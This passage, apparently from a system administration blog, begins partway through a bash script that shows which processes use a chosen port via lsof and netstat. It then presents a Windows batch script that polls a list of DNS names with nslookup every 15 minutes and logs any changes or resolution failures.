echo "Example: $0 8080"
exit 1
fi
PORT=$1
# Validate port number
if ! [[ $PORT =~ ^[0-9]+$ ]] || [ $PORT -lt 1 ] || [ $PORT -gt 65535 ]; then
echo "Error: Please provide a valid port number (1-65535)"
exit 1
fi
# Function to display processes using the port
show_port_usage() {
local timestamp=$(date "+%Y-%m-%d %H:%M:%S")
# Clear screen for better readability
clear
echo "=================================="
echo "Port Monitor - Port $PORT"
echo "Last updated: $timestamp"
echo "Press Ctrl+C to exit"
echo "=================================="
echo
# Check for processes using the port with lsof - both TCP and UDP
if lsof -i :$PORT &>/dev/null || netstat -an | grep -E "[:.]$PORT[[:space:]]" &>/dev/null; then
echo "Processes using port $PORT:"
echo
lsof -i :$PORT -P -n | head -1
echo "--------------------------------------------------------------------------------"
lsof -i :$PORT -P -n | tail -n +2
echo
# Also show netstat information for additional context
echo "Network connections on port $PORT:"
echo
printf "%-6s %-30s %-30s %-12s\n" "PROTO" "LOCAL ADDRESS" "FOREIGN ADDRESS" "STATE"
echo "--------------------------------------------------------------------------------------------"
# Show all connections (LISTEN, ESTABLISHED, etc.)
# Use netstat -n to show numeric addresses
netstat -anp tcp | grep -E "\.$PORT[[:space:]]" | while read line; do
# Extract the relevant fields from netstat output
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
foreign_addr=$(echo "$line" | awk '{print $5}')
state=$(echo "$line" | awk '{print $6}')
# Only print if we have valid data
if [ -n "$proto" ] && [ -n "$local_addr" ]; then
printf "%-6s %-30s %-30s %-12s\n" "$proto" "$local_addr" "$foreign_addr" "$state"
fi
done
# Also check UDP connections
netstat -anp udp | grep -E "\.$PORT[[:space:]]" | while read line; do
proto=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $4}')
foreign_addr=$(echo "$line" | awk '{print $5}')
printf "%-6s %-30s %-30s %-12s\n" "$proto" "$local_addr" "$foreign_addr" "-"
done
# Also check for any established connections using lsof
echo
echo "Active connections with processes:"
echo "--------------------------------------------------------------------------------------------"
lsof -i :$PORT -P -n 2>/dev/null | grep -v LISTEN | tail -n +2 | while read line; do
if [ -n "$line" ]; then
echo "$line"
fi
done
else
echo "No processes found using port $PORT"
echo
# Check if the port might be in use but not showing up in lsof
local netstat_result=$(netstat -anv | grep -E "\.$PORT ")
if [ -n "$netstat_result" ]; then
echo "However, netstat shows activity on port $PORT:"
echo "$netstat_result"
fi
fi
echo
echo "Refreshing in 20 seconds... (Press Ctrl+C to exit)"
}
# Trap Ctrl+C to exit gracefully
trap 'echo -e "\n\nExiting port monitor..."; exit 0' INT
# Main loop - refresh every 20 seconds
while true; do
show_port_usage
sleep 20
done

Windows Server: Polling critical DNS entries for any changes or errors

If you have tier 1 services that are dependant on a few DNS records, then you may want a simple batch job to monitor these dns records for changes or deletion.

The script below contains an example list of DNS entries (replace these records for the ones you want to monitor).

@echo off
setlocal enabledelayedexpansion
REM ============================================================================
REM DNS Monitor Script for Windows Server
REM Purpose: Monitor DNS entries for changes every 15 minutes
REM Author: Andrew Baker
REM Version: 1.0
REM Date: August 13, 2018
REM ============================================================================
REM Configuration Variables
set "LOG_FILE=dns_monitor.log"
set "PREVIOUS_FILE=dns_previous.tmp"
set "CURRENT_FILE=dns_current.tmp"
set "CHECK_INTERVAL=900"
REM DNS Entries to Monitor (Comma Separated List)
REM Add or modify domains as needed
set "DNS_LIST=google.com,microsoft.com,github.com,stackoverflow.com,amazon.com,facebook.com,twitter.com,linkedin.com,youtube.com,cloudflare.com"
REM Initialize log file with header if it doesn't exist
if not exist "%LOG_FILE%" (
echo DNS Monitor Log - Started on %DATE% %TIME% > "%LOG_FILE%"
echo ============================================================================ >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
:MAIN_LOOP
echo [%DATE% %TIME%] Starting DNS monitoring cycle...
echo [%DATE% %TIME%] INFO: Starting DNS monitoring cycle >> "%LOG_FILE%"
REM Clear current results file
if exist "%CURRENT_FILE%" del "%CURRENT_FILE%"
REM Process each DNS entry
for %%d in (%DNS_LIST%) do (
call :CHECK_DNS "%%d"
)
REM Compare with previous results if they exist
if exist "%PREVIOUS_FILE%" (
call :COMPARE_RESULTS
) else (
echo [%DATE% %TIME%] INFO: First run - establishing baseline >> "%LOG_FILE%"
)
REM Copy current results to previous for next comparison
copy "%CURRENT_FILE%" "%PREVIOUS_FILE%" >nul 2>&1
echo [%DATE% %TIME%] DNS monitoring cycle completed. Next check in 15 minutes...
echo [%DATE% %TIME%] INFO: DNS monitoring cycle completed >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
REM Wait 15 minutes (900 seconds) before next check
timeout /t %CHECK_INTERVAL% /nobreak >nul
goto MAIN_LOOP
REM ============================================================================
REM Function: CHECK_DNS
REM Purpose: Resolve DNS entry and log results
REM Parameter: %1 = Domain name to check
REM ============================================================================
:CHECK_DNS
set "DOMAIN=%~1"
echo Checking DNS for: %DOMAIN%
REM Perform nslookup and capture results
nslookup "%DOMAIN%" > temp_dns.txt 2>&1
REM Check if nslookup was successful
if %ERRORLEVEL% equ 0 (
REM Extract IP addresses from nslookup output
for /f "tokens=2" %%i in ('findstr /c:"Address:" temp_dns.txt ^| findstr /v "#53"') do (
set "IP_ADDRESS=%%i"
echo %DOMAIN%,!IP_ADDRESS! >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] INFO: %DOMAIN% resolves to !IP_ADDRESS! >> "%LOG_FILE%"
)
REM Handle case where no IP addresses were found in successful lookup
findstr /c:"Address:" temp_dns.txt | findstr /v "#53" >nul
if !ERRORLEVEL! neq 0 (
echo %DOMAIN%,RESOLUTION_ERROR >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] ERROR: %DOMAIN% - No IP addresses found in DNS response >> "%LOG_FILE%"
type temp_dns.txt >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
) else (
REM DNS resolution failed
echo %DOMAIN%,DNS_FAILURE >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] ERROR: %DOMAIN% - DNS resolution failed >> "%LOG_FILE%"
type temp_dns.txt >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
REM Clean up temporary file
if exist temp_dns.txt del temp_dns.txt
goto :EOF
REM ============================================================================
REM Function: COMPARE_RESULTS
REM Purpose: Compare current DNS results with previous results
REM ============================================================================
:COMPARE_RESULTS
echo Comparing DNS results for changes...
REM Read previous results into memory
if exist "%PREVIOUS_FILE%" (
for /f "tokens=1,2 delims=," %%a in (%PREVIOUS_FILE%) do (
set "PREV_%%a=%%b"
)
)
REM Compare current results with previous
for /f "tokens=1,2 delims=," %%a in (%CURRENT_FILE%) do (
set "CURRENT_DOMAIN=%%a"
set "CURRENT_IP=%%b"
REM Get previous IP for this domain
set "PREVIOUS_IP=!PREV_%%a!"
if "!PREVIOUS_IP!"=="" (
REM New domain added
echo [%DATE% %TIME%] INFO: New domain added to monitoring: !CURRENT_DOMAIN! = !CURRENT_IP! >> "%LOG_FILE%"
) else if "!PREVIOUS_IP!" neq "!CURRENT_IP!" (
REM DNS change detected
echo [%DATE% %TIME%] WARNING: DNS change detected for !CURRENT_DOMAIN! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: Previous IP: !PREVIOUS_IP! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: Current IP:  !CURRENT_IP! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: *** INVESTIGATE DNS CHANGE *** >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
REM Also display warning on console
echo.
echo *** WARNING: DNS CHANGE DETECTED ***
echo Domain: !CURRENT_DOMAIN!
echo Previous: !PREVIOUS_IP!
echo Current:  !CURRENT_IP!
echo Check log file for details: %LOG_FILE%
echo.
)
)
REM Check for domains that disappeared from current results
for /f "tokens=1,2 delims=," %%a in (%PREVIOUS_FILE%) do (
set "CHECK_DOMAIN=%%a"
set "FOUND=0"
for /f "tokens=1 delims=," %%c in (%CURRENT_FILE%) do (
if "%%c"=="!CHECK_DOMAIN!" set "FOUND=1"
)
if "!FOUND!"=="0" (
echo [%DATE% %TIME%] WARNING: Domain !CHECK_DOMAIN! no longer resolving or removed from monitoring >> "%LOG_FILE%"
)
)
goto :EOF
REM ============================================================================
REM End of Script
REM ============================================================================